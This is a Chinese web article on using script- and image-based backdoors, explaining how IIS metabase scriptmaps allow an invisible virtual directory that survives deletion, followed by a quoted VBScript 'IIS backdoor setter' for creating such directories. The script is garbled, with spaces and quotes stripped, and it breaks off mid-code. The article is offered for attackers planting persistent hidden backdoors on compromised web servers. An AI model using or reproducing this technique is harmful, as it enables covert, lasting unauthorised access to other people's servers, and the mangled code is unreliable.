脚本图片类后门病毒的完美使用方法

在此之前我先简单说明一下这个iis漏洞的原因：我们知道iis的配置文件是metabase.bin。这个文件位于%systemroot%\system32\inetsrv\metabase.bin，包含了几乎所有iis的配置信息，是非常重要的系统文件。简单的说，我们在“intenet服务管理器”中所作的一切设置最终都会被保存在metabase.bin中。在日常的系统管理中除了通过“intenet服务管理器”来对metabase.bin进行操作外，windows还提供了一个脚本adsutil.vbs可以对metabase.bin进行操作。

(AdWords)metabase的结构类似于注册表，也是树形结构，有类似键、值、项的概念。事实上在iis3和pws中，metabase的内容就是存储在注册表中的。metabase有两个主键：lm和schema。其中，schema保存了系统默认的一些配置，通常不需要修改，一旦改错也非常危险，所以无论是“intenet服务管理器”还是adsutil.vbs都没有提供修改schema的机制。lm中包含了iis的http服务，ftp服务，smtp服务等的配置信息。其中，lm/w3svc/下是我们要用到的http服务的配置信息。

其中有一个值：scriptmaps，代表脚本映射。当我们在某个虚拟目录下设定scriptmaps值后，则向该目录请求的特定扩展名的文件都会交给指定的isapi执行。需要强调的是，设定scriptmaps的目录并不一定要真实存在的，只要在metabase中某个http实例的root键下建了一个子键，对该字键同名的虚拟目录的http请求iis会认为是合法的，并会交由映射的isapi处理。 copyright dedecms

这样说可能谁都晕了(包括我)，其实简单的作个类比：metabase的就够类似于注册表，我们知道，我们在安装有些程序的时候，安装程序会在注册表中建立一些必要的值，可我们一旦非正规把它安装的文件删除了时(比如有些朋友删游戏时就是直接往回收站一拉了事)，注册表中的那些项就会被留下，没有用处，而造成注册表垃圾。metabase中也是那么回事，我们正常建立一个虚拟目录时，metabase中就会建立一些项。而当我们通过非正常手段删除了此虚拟目录时，那些项就会留下，与注册表不同的是，那些项还会起作用，只要我们用http请求了那个虚拟目录，iis就会依旧按照metabase中的原来的虚拟目录设置顺利返回。

所以即使目录不存在，只要他曾经存在过，那么就成立。呵呵，听懂了没?(ps：还没懂)晕，那就只好请您看动鲨的那篇文章了，他说得可比我清楚。至于如何添加不可见的虚拟目录，动鲨的那篇文章说得很清楚了，我这里就不废话了，下面提供动鲨的添加不可见虚拟目录的脚本，保存为iis.vbs：代码help1=iis后门设置器forwin2000by动鲨5月30号2004年help2=请输入正确的虚拟目录名称和映射的路径,格式如下help3=cscript.exeiis.vbs虚拟目录的名称映射的路径help4=例如:cscript.exeiis.vbsbackdoorc:\setargs=wscript.argumentsifargs.count<2thenwscript.echohelp1wscript.echowscript.echohelp2wscript.echowscript.echohelp3wscript.echowscript.echohelp4wscript.quitendifstrvrname=args(0)虚拟目录名称strrootpath=args(1)虚拟目录路径setcheckvirtualdir=getobject(iis://localhost/w3svc/1/root)foreachvrincheckvirtualdirifvr.name=lhxythenfoundt=yeselsefoundt=noendifnextiffoundt=yesthenwscript.echo发现已经创建了lhxy目录，正在设置自定义的虚拟目录creatvdirelsewscript.echo正在创建lhxy目录，以及自定义文件夹，请等待!

看完这篇，您有何感觉呢？

上一篇：股市热潮引发电脑安全隐患 股民安全八大注意   下一篇：QQ盗号木马USBINE.SYS暂时解决方法

用户名(必填) 新注册

密码(必填) 匿名评论